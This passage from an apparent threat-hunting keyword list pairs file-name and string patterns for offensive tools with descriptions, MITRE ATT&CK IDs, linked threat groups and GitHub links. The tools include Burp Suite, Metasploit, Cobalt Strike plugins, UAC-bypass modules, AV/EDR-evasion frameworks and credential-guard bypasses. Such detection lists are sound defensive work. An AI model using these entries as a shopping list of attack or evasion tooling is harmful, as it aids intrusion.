Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EncodeGroup/UAC-SilentClean,1,1,N/A,10,10,173,32,2021-07-14T13:51:02Z,2020-10-07T13:25:21Z -*burnett_top_1024.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Burp Suite*,offensive_tool_keyword,burpsuite,The class-leading vulnerability scanning. penetration testing. and web app security platform,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation Tools,https://portswigger.net/burp,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*burp*PayloadParser.py*,offensive_tool_keyword,burpsuite,PayloadParser - Burp Suite NMap Parsing Interface in Python,T1583 - T1595 - T1190,TA0001 - TA0003 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/infodel/burp.extension-payloadparser,1,1,N/A,N/A,1,4,3,2013-03-15T20:41:45Z,2013-03-15T20:39:23Z -*burp*SQLMapper.xml*,offensive_tool_keyword,burpsuite,CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API,T1583 - T1595 - T1190,TA0001 - TA0002 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/JGillam/burp-co2,1,1,N/A,N/A,2,142,40,2019-12-24T22:30:15Z,2015-04-19T03:38:34Z -*burp.extension-payloadparser*,offensive_tool_keyword,burpsuite,PayloadParser - Burp Suite NMap Parsing Interface in Python,T1583 - T1595 - T1190,TA0001 - TA0003 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/infodel/burp.extension-payloadparser,1,1,N/A,N/A,1,4,3,2013-03-15T20:41:45Z,2013-03-15T20:39:23Z -*burp_log_*.log*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*Burp_start.bat*,offensive_tool_keyword,burpsuite,Collection of burpsuite plugins,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/Mr-xn/BurpSuite-collections,1,1,N/A,N/A,10,2757,606,2023-08-04T13:50:07Z,2020-01-25T02:07:37Z -*Burp_start_en.bat*,offensive_tool_keyword,burpsuite,Collection of burpsuite plugins,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/Mr-xn/BurpSuite-collections,1,1,N/A,N/A,10,2757,606,2023-08-04T13:50:07Z,2020-01-25T02:07:37Z -*burp2malleable.*,offensive_tool_keyword,cobaltstrike,Quick python utility I wrote to turn HTTP requests from burp suite into Cobalt Strike Malleable C2 profiles,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CodeXTF2/Burp2Malleable,1,1,N/A,10,10,320,32,2023-04-06T15:24:12Z,2022-08-14T18:05:39Z -*burp-co2/out/artifacts*,offensive_tool_keyword,burpsuite,CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API,T1583 - T1595 - T1190,TA0001 - TA0002 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/JGillam/burp-co2,1,1,N/A,N/A,2,142,40,2019-12-24T22:30:15Z,2015-04-19T03:38:34Z -*BurpCO2Suite.xml*,offensive_tool_keyword,burpsuite,CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API,T1583 - T1595 - T1190,TA0001 - TA0002 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/JGillam/burp-co2,1,1,N/A,N/A,2,142,40,2019-12-24T22:30:15Z,2015-04-19T03:38:34Z -*burpcollaborator.net*,offensive_tool_keyword,burpsuite,Burp Suite is a leading range of cybersecurity tools. brought to you by PortSwigger. We believe in giving our users a competitive advantage through superior research. This tool is not free and open source,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://portswigger.net/burp,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*BurpFunctions.java*,offensive_tool_keyword,burpsuite,A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/nccgroup/BurpSuiteHTTPSmuggler,1,1,N/A,N/A,7,668,108,2019-05-04T06:15:42Z,2018-07-03T07:47:58Z -*burpitem.py*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*burplog.py*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*BurpShiroPassiveScan.jar*,offensive_tool_keyword,burpsuite,Collection of burpsuite plugins,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/Mr-xn/BurpSuite-collections,1,1,N/A,N/A,10,2757,606,2023-08-04T13:50:07Z,2020-01-25T02:07:37Z -*burpstate.py*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*Burpsuite*,offensive_tool_keyword,burpsuite,Burp Suite is a leading range of cybersecurity tools. brought to you by PortSwigger. We believe in giving our users a competitive advantage through superior research. This tool is not free and open source,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://portswigger.net/burp,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*burpsuite*.exe*,offensive_tool_keyword,burpsuite,The class-leading vulnerability scanning. penetration testing. and web app security platform,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation Tools,https://portswigger.net/burp,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*burpsuite*.jar*,offensive_tool_keyword,burpsuite,The class-leading vulnerability scanning. penetration testing. and web app security platform,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation Tools,https://portswigger.net/burp,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*burpsuite*.sh*,offensive_tool_keyword,burpsuite,The class-leading vulnerability scanning. penetration testing. and web app security platform,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation Tools,https://portswigger.net/burp,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*burpsuite*.zip*,offensive_tool_keyword,burpsuite,The class-leading vulnerability scanning. penetration testing. and web app security platform,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation Tools,https://portswigger.net/burp,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*BurpSuiteCn.jar*,offensive_tool_keyword,burpsuite,Collection of burpsuite plugins,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/Mr-xn/BurpSuite-collections,1,1,N/A,N/A,10,2757,606,2023-08-04T13:50:07Z,2020-01-25T02:07:37Z -*BurpSuiteHTTPSmuggler*,offensive_tool_keyword,burpsuite,A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/nccgroup/BurpSuiteHTTPSmuggler,1,1,N/A,N/A,7,668,108,2019-05-04T06:15:42Z,2018-07-03T07:47:58Z -*BurpSuite-SecretFinder*,offensive_tool_keyword,secretfinder,SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files,T1083 - T1081 - T1113,TA0003 - TA0002 - TA0007,N/A,N/A,Credential Access,https://github.com/m4ll0k/SecretFinder,1,1,N/A,N/A,10,1524,324,2023-06-13T00:49:58Z,2020-06-08T10:50:12Z -*burp-vulners-scanner-*.jar*,offensive_tool_keyword,burpsuite,Collection of burpsuite plugins,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/Mr-xn/BurpSuite-collections,1,1,N/A,N/A,10,2757,606,2023-08-04T13:50:07Z,2020-01-25T02:07:37Z -*burp-xss-sql-plugin*,offensive_tool_keyword,burpsuite,find several bugbounty-worthy XSSes. OpenRedirects and SQLi.,T1583 - T1595 - T1190,TA0001 - TA0002 - TA0008 - TA0011,N/A,N/A,Network Exploitation tools,https://github.com/attackercan/burp-xss-sql-plugin,1,1,N/A,N/A,1,44,12,2016-09-28T21:46:18Z,2016-08-17T14:05:24Z -*buster -e * -f john -l doe -b '****1989'*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*busterPayloads.txt*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*bWV0YXNwbG9pdA==*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*byakugan/bin/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Bye_Explorer.ino*,offensive_tool_keyword,Pateensy,payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy,T1025 T1052,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Pateensy,1,1,N/A,N/A,2,132,64,2017-01-26T12:02:56Z,2016-03-21T07:29:38Z -*BYOVD_kill_av_edr.*,offensive_tool_keyword,BYOVD_kill_av_edr,BYOD to kill AV/EDR,T1562.001,TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/infosecn1nja/red-team-scripts/blob/main/BYOVD_kill_av_edr.c,1,1,N/A,10,3,228,42,2023-06-14T02:13:19Z,2023-01-15T22:37:34Z -*bypass_cmdinject*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*bypass_powershell_protections*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Bypass-4MSI*,offensive_tool_keyword,evil-winrm,This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.,T1021.006 - T1059.001 - T1059.003 - T1047,TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/Hackplayers/evil-winrm,1,0,N/A,10,10,3760,566,2023-06-09T07:42:42Z,2019-05-28T10:53:00Z -*bypass-amsi*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*BypassAV.exe*,offensive_tool_keyword,cobaltstrike,Cobalt Strike plugin for quickly generating anti-kill executable files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/hack2fun/BypassAV,1,1,N/A,10,10,830,126,2020-07-19T15:46:54Z,2020-02-17T02:33:14Z -*bypass-classic.dll*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*BypassCredGuard.*,offensive_tool_keyword,BypassCredGuard,Credential Guard Bypass Via Patching Wdigest Memory,T1558 - T1558.001 - T1055 - T1055.002,TA0006 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wh0amitz/BypassCredGuard,1,1,N/A,10,3,277,50,2023-02-03T06:55:43Z,2023-01-18T15:16:11Z -*BypassCredGuard-master*,offensive_tool_keyword,BypassCredGuard,Credential Guard Bypass Via Patching Wdigest Memory,T1558 - T1558.001 - T1055 - T1055.002,TA0006 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wh0amitz/BypassCredGuard,1,1,N/A,10,3,277,50,2023-02-03T06:55:43Z,2023-01-18T15:16:11Z -*BYPASS-DINVOKE*.dll*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1027 - T1055 - T1070 - T1112 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*BYPASS-DINVOKE.dll*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*BYPASS-DINVOKE_MANUAL_MAPPING.dll*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*bypass-pipe.c*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*bypass-powershell.ps1*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*BypassUAC *.exe*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,0,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*bypassuac fodhelper*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*Bypass-UAC*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*bypassUAC*.boo*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*bypassUAC*.py*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*--bypass-uac*--logontype*,offensive_tool_keyword,RunasCs,RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential,T1055 - T1134.001,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs,1,0,N/A,N/A,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -*bypassuac_comhijack.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*bypassuac_compdefaults*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*bypassuac_compmgmtlauncher*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z 